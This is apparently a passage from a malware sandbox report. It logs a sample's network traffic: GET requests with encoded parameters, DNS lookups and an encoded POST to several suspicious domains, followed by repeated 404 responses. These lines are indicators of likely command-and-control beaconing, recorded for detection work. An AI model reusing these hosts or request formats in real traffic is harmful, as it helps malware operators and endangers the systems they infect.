Source: global traffic	HTTP traffic detected: GET /rr50/?AV=_ng4uzR8Zz&SXqH06e=2kOM/31TW1roA/W1co45WLRXgmahHcobiheM1q2t86GHiq/JR2HJqxRNoSYt1v1K2qoLuY73JnsiaWdINJegakBCvO0IhsrDF+fhoUhJ53IQt5p3geHx+pw= HTTP/1.1Host: www.rotaprefabrik.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /nxj8/?SXqH06e=JnSQlo2AJaGm+nFT2qZSRg0fIOiYW2yRChe1TvEOMyeVSI4Rrbd3M1U4P44prWGvlp78DR0O0ozNIt3GVmTMd3t1XoLI1R7o2Qu96VhEkD058LDdwikyqZA=&AV=_ng4uzR8Zz HTTP/1.1Host: www.hpo0snermcvqv.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /pobq/?SXqH06e=0hFZeB1J5YMps7YD9EXKzRFoue9yrlGg73wLiWYmmwVdUbyA0yCYARPd/TCJVzbB+Mjph3HYSufKySLgqUImG9FEAb3pqAbgiqKGJfzggFu5TBR26YX/ycI=&AV=_ng4uzR8Zz HTTP/1.1Host: www.inride.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /9uf2/?SXqH06e=Tjb20Msl4sgbUMPAv0cgLdvoJjlvR840pSXAvJDGRu8+pqajaKEFoYauxtPF4KhiJSnYn4AUVVoWqG6D5/7kjylfywLE97TnvLa2s9Ew2nrTmaz066FYaB4=&AV=_ng4uzR8Zz HTTP/1.1Host: www.15827f0ea96ee84a.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /1zzj/?AV=_ng4uzR8Zz&SXqH06e=e+7rX/frfIk10QOuz43kkA+7jJ9/vO9/QWtHdTtOO6Fm9aJkeQOf2OoD1t74k7EvqDg8Zmex5vpF0dGn3lNO/doA4NH7zXjCLT1laLVyk0bFqCORK0S89RE= HTTP/1.1Host: www.baseinvestments.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /14e7/?SXqH06e=bCPQ5+1rXgIzzb6Yab0pbAhhQb9XrByT/Ak2H+GAO5bcJYJuu6EdQZ+EA6E6dYH2KOSHyjKcRtCqIh6kAwLxr/W5k5rXUDR6Bybr1Ao3GXQhCERrhJ9UbaA=&AV=_ng4uzR8Zz HTTP/1.1Host: www.techcadweb.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /51n1/?AV=_ng4uzR8Zz&SXqH06e=GTW7gMD+qiwDmkYMJmUUrrCMtPJL2sno34c5EOl9BVUJx5mTrUvVWfi+3MCo3S0zEbpqipJYWNklsBw4Yc3dmLLAIpXZJumvdrAhXZ5L2dMToSPZFVVe9UQ= HTTP/1.1Host: www.eastcoastev.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2

Source: global traffic	DNS traffic detected: DNS query: www.rotaprefabrik.online
Source: global traffic	DNS traffic detected: DNS query: www.hpo0snermcvqv.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sdrynwhuf13.sbs
Source: global traffic	DNS traffic detected: DNS query: www.inride.top
Source: global traffic	DNS traffic detected: DNS query: www.inbet.company
Source: global traffic	DNS traffic detected: DNS query: www.15827f0ea96ee84a.com
Source: global traffic	DNS traffic detected: DNS query: www.baseinvestments.site
Source: global traffic	DNS traffic detected: DNS query: www.techcadweb.tech
Source: global traffic	DNS traffic detected: DNS query: www.eastcoastev.site
Source: global traffic	DNS traffic detected: DNS query: www.cooperativas.lat

Source: unknown

HTTP traffic detected: POST /nxj8/ HTTP/1.1Host: www.hpo0snermcvqv.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.hpo0snermcvqv.xyzReferer: http://www.hpo0snermcvqv.xyz/nxj8/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2Data Raw: 53 58 71 48 30 36 65 3d 45 6c 36 77 6d 64 4b 64 52 4e 36 33 78 30 6c 6f 31 61 35 51 54 6c 68 70 49 50 65 46 59 67 7a 6b 49 32 71 55 66 5a 77 48 4c 51 6d 61 65 4d 55 57 33 4c 4e 71 4f 6d 55 58 41 66 52 4f 2b 33 50 74 74 2f 2b 48 41 57 49 76 72 4f 33 2b 4a 74 62 6c 62 6d 44 63 63 47 35 75 56 70 66 30 75 51 37 4c 31 31 43 64 34 6c 31 66 73 69 49 6f 72 4c 61 6a 2b 69 6c 4a 67 61 4f 70 45 65 68 6a 42 4d 6f 76 31 6e 57 31 71 49 58 6f 33 41 71 6d 6c 59 44 75 48 35 34 36 79 30 4d 2f 5a 4d 6e 4c 39 35 67 6b 69 76 59 37 34 46 6e 41 51 34 69 42 74 38 45 62 44 71 38 56 2b 6b 4a 45 6f 72 4e 38 2f 57 34 2f 2f 51 3d 3d Data Ascii: SXqH06e=El6wmdKdRN63x0lo1a5QTlhpIPeFYgzkI2qUfZwHLQmaeMUW3LNqOmUXAfRO+3Ptt/+HAWIvrO3+JtblbmDccG5uVpf0uQ7L11Cd4l1fsiIorLaj+ilJgaOpEehjBMov1nW1qIXo3AqmlYDuH546y0M/ZMnL95gkivY74FnAQ4iBt8EbDq8V+kJEorN8/W4//Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 02 Aug 2024 11:41:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-02T11:41:19.4784014Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:41:57 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:41:59 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:02 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:04 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 427Content-Type: text/html; charset=utf-8Date: Fri, 02 Aug 2024 11:42:19 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 88 b0 e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e5 9f 9f e5 90 8d e5 af b9 e5 ba 94 e7 9a 84 e7 bd 91 e7 ab 99 ef bc 8c e8 af b7 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e3 80 82 3c 2f 70 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 427Content-Type: text/html; charset=utf-8Date: Fri, 02 Aug 2024 11:42:22 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 88 b0 e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e5 9f 9f e5 90 8d e5 af b9 e5 ba 94 e7 9a 84 e7 bd 91 e7 ab 99 ef bc 8c e8 af b7 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e3 80 82 3c 2f 70 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 427Content-Type: text/html; charset=utf-8Date: Fri, 02 Aug 2024 11:42:24 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 88 b0 e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e5 9f 9f e5 90 8d e5 af b9 e5 ba 94 e7 9a 84 e7 bd 91 e7 ab 99 ef bc 8c e8 af b7 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e3 80 82 3c 2f 70 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 427Content-Type: text/html; charset=utf-8Date: Fri, 02 Aug 2024 11:42:27 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 